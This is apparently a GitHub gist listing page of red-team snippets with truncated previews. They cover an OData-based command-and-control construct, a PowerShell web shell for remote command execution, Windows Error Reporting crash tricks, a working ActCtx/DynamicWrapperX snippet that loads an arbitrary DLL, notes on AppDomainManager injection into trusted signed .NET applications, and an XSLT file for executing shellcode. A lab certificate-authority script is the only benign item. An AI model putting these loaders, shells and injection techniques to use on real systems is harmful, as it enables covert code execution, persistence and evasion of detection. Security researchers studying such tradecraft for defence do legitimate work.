@secdev02
secdev02 / README.md
Created December 10, 2025 13:23
TLS Debug - Serverless Prototype - Woot!

Building a Serverless Reverse TLS Proxy Experiment.

curl "https://www.tlsdebug.com/debug?site=example.com"

{
  "request": {
    "method": "GET",
    "url": "https://example.com/",
@secdev02
secdev02 / Odata.ps1
Last active December 9, 2025 17:15
OMGData - Using Odata for C2 basic construct.
# HelloOData.ps1 - Minimal OData Service
$url = "http://localhost:8080/"
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add($url)
$listener.Start()
Write-Host "OData service running at $url"
Write-Host "Try: ${url}odata/`$metadata"
Write-Host "Try: ${url}odata/Messages"
@secdev02
secdev02 / powawebshell.ps1
Last active December 9, 2025 14:42
PowerWebShell - Basic
# PowerShell Web Command Executor
# WARNING: This script allows remote command execution and poses significant security risks
# Use only in isolated/trusted environments with proper security measures
# Configuration
$port = 8080
$prefix = "http://" + $port + "/"
# Create HTTP listener
$listener = New-Object System.Net.HttpListener
@secdev02
secdev02 / Crasher.cs
Last active December 7, 2025 22:03
WER R U - WerRegisterRuntimeExceptionModule Shenanigans
using System;
namespace CrashTestApp
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Crash Test Application");
Console.WriteLine("======================");
@secdev02
secdev02 / CrashIt.ps1
Created December 7, 2025 15:00
WerFault Shenanigans
<#
.SYNOPSIS
Configure Windows Error Reporting to use an internal corporate server,
trigger a test crash, and review reports.
.DESCRIPTION
This script provides functions to:
- Set WER corporate server URL and settings
- Trigger a basic crash for testing
- Review pending and archived WER reports
@secdev02
secdev02 / sc.js
Created December 7, 2025 14:34 — forked from benheise/sc.js
DynamicWrapperX - Register Code Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
@secdev02
secdev02 / DllLoadAnythingViaScript
Created December 6, 2025 18:58 — forked from analyticsearch/DllLoadAnythingViaScript
DynamicWrapperX - Dropper , Registration-Free Execution
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.
# Sample DLL To inject here
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179
$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");
@secdev02
secdev02 / _notes.md
Created December 6, 2025 18:58 — forked from byt3bl33d3r/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed; they do this by matching Original Filename to Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@secdev02
secdev02 / New-LabRootCA.ps1
Created November 30, 2025 15:13 — forked from JaekelEDV/New-LabRootCA.ps1
Powershell Script to install and configure a standalone RootCA for Lab-Environments
<#
.SYNOPSIS
Script to install and configure a standalone RootCA for Lab-Environments
.DESCRIPTION
This Script sets up a standalone RootCA. Its main purpose is to save time when building Labs in the classes I teach.
###It's not meant for production!###
First, it creates a CAPolicy.inf file. Then it deletes all default CDP and AIA and configures new ones.
It turns on auditing and copies (It's a Lab!!!, so obviously no real offline RootCA...) the crt and crl to an edge webserver.
.NOTES
Author: Oliver Jäkel | [email protected] | @JaekelEDV
@secdev02
secdev02 / shellcode.xslt
Created November 30, 2025 13:34
Weird Shit - Execute with Style
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<!--from
https://gist.github.com/subTee/aa548b36b5d3c8f07e2024ab39217712
-->
<msxsl:script language="JScript" implements-prefix="user">
<![CDATA[